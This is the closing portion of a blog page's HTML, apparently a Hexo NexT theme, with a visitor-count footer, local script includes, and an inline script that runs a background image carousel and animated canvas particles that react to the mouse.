    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="总阅读量 fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<div class="site-bg-carousel" id="siteBgCarousel">
  <div class="bg-slide active" style="background-image: url('/images/background/bg-1.jpg');"></div>
  <div class="bg-slide" style="background-image: url('/images/background/bg-2.jpg');"></div>
  <div class="bg-slide" style="background-image: url('/images/background/bg-3.jpg');"></div>
</div>
<div class="site-bg-mask"></div>
<canvas id="particles-canvas"></canvas>

<script>
(function () {
  // ========== 背景轮播 ==========
  var slides = document.querySelectorAll('#siteBgCarousel .bg-slide');
  var current = 0;
  var INTERVAL = 6000; // 6 秒切换
  if (slides.length > 1) {
    setInterval(function () {
      slides[current].classList.remove('active');
      current = (current + 1) % slides.length;
      slides[current].classList.add('active');
    }, INTERVAL);
  }

  // ========== Canvas 连线粒子 ==========
  var canvas = document.getElementById('particles-canvas');
  var ctx = canvas.getContext('2d');
  var particles = [];
  var mouse = { x: null, y: null };
  var COUNT = 70; // 粒子数量
  var LINK_DIST = 140; // 连线距离

  function resize() {
    canvas.width = window.innerWidth;
    canvas.height = window.innerHeight;
  }
  resize();
  window.addEventListener('resize', resize);

  function random(min, max) { return Math.random() * (max - min) + min; }

  function createParticles() {
    particles = [];
    for (var i = 0; i < COUNT; i++) {
      particles.push({
        x: Math.random() * canvas.width,
        y: Math.random() * canvas.height,
        vx: random(-0.5, 0.5),
        vy: random(-0.5, 0.5),
        r: random(1, 2.5)
      });
    }
  }
  createParticles();

  window.addEventListener('mousemove', function (e) {
    mouse.x = e.clientX;
    mouse.y = e.clientY;
  });
  window.addEventListener('mouseout', function () {
    mouse.x = null;
    mouse.y = null;
  });

  function draw() {
    ctx.clearRect(0, 0, canvas.width, canvas.height);
    var i, j, dx, dy, dist, alpha;
    // 连线
    for (i = 0; i < particles.length; i++) {
      for (j = i + 1; j < particles.length; j++) {
        dx = particles[i].x - particles[j].x;
        dy = particles[i].y - particles[j].y;
        dist = Math.sqrt(dx * dx + dy * dy);
        if (dist < LINK_DIST) {
          alpha = 1 - dist / LINK_DIST;
          ctx.strokeStyle = 'rgba(120, 200, 255, ' + (alpha * 0.5).toFixed(3) + ')';
          ctx.lineWidth = 1;
          ctx.beginPath();
          ctx.moveTo(particles[i].x, particles[i].y);
          ctx.lineTo(particles[j].x, particles[j].y);
          ctx.stroke();
        }
      }
    }
    // 与鼠标连线
    if (mouse.x !== null) {
      for (i = 0; i < particles.length; i++) {
        dx = particles[i].x - mouse.x;
        dy = particles[i].y - mouse.y;
        dist = Math.sqrt(dx * dx + dy * dy);
        if (dist < LINK_DIST * 1.2) {
          alpha = 1 - dist / (LINK_DIST * 1.2);
          ctx.strokeStyle = 'rgba(255, 255, 255, ' + (alpha * 0.4).toFixed(3) + ')';
          ctx.lineWidth = 1;
          ctx.beginPath();
          ctx.moveTo(particles[i].x, particles[i].y);
          ctx.lineTo(mouse.x, mouse.y);
          ctx.stroke();
        }
      }
    }
    // 粒子
    for (i = 0; i < particles.length; i++) {
      var p = particles[i];
      p.x += p.vx;
      p.y += p.vy;
      if (p.x < 0 || p.x > canvas.width) p.vx *= -1;
      if (p.y < 0 || p.y > canvas.height) p.vy *= -1;
      ctx.beginPath();
      ctx.arc(p.x, p.y, p.r, 0, Math.PI * 2);
      ctx.fillStyle = 'rgba(140, 210, 255, 0.85)';
      ctx.fill();
    }
    requestAnimationFrame(draw);
  }
  draw();
})();
</script>
</body>
</html>
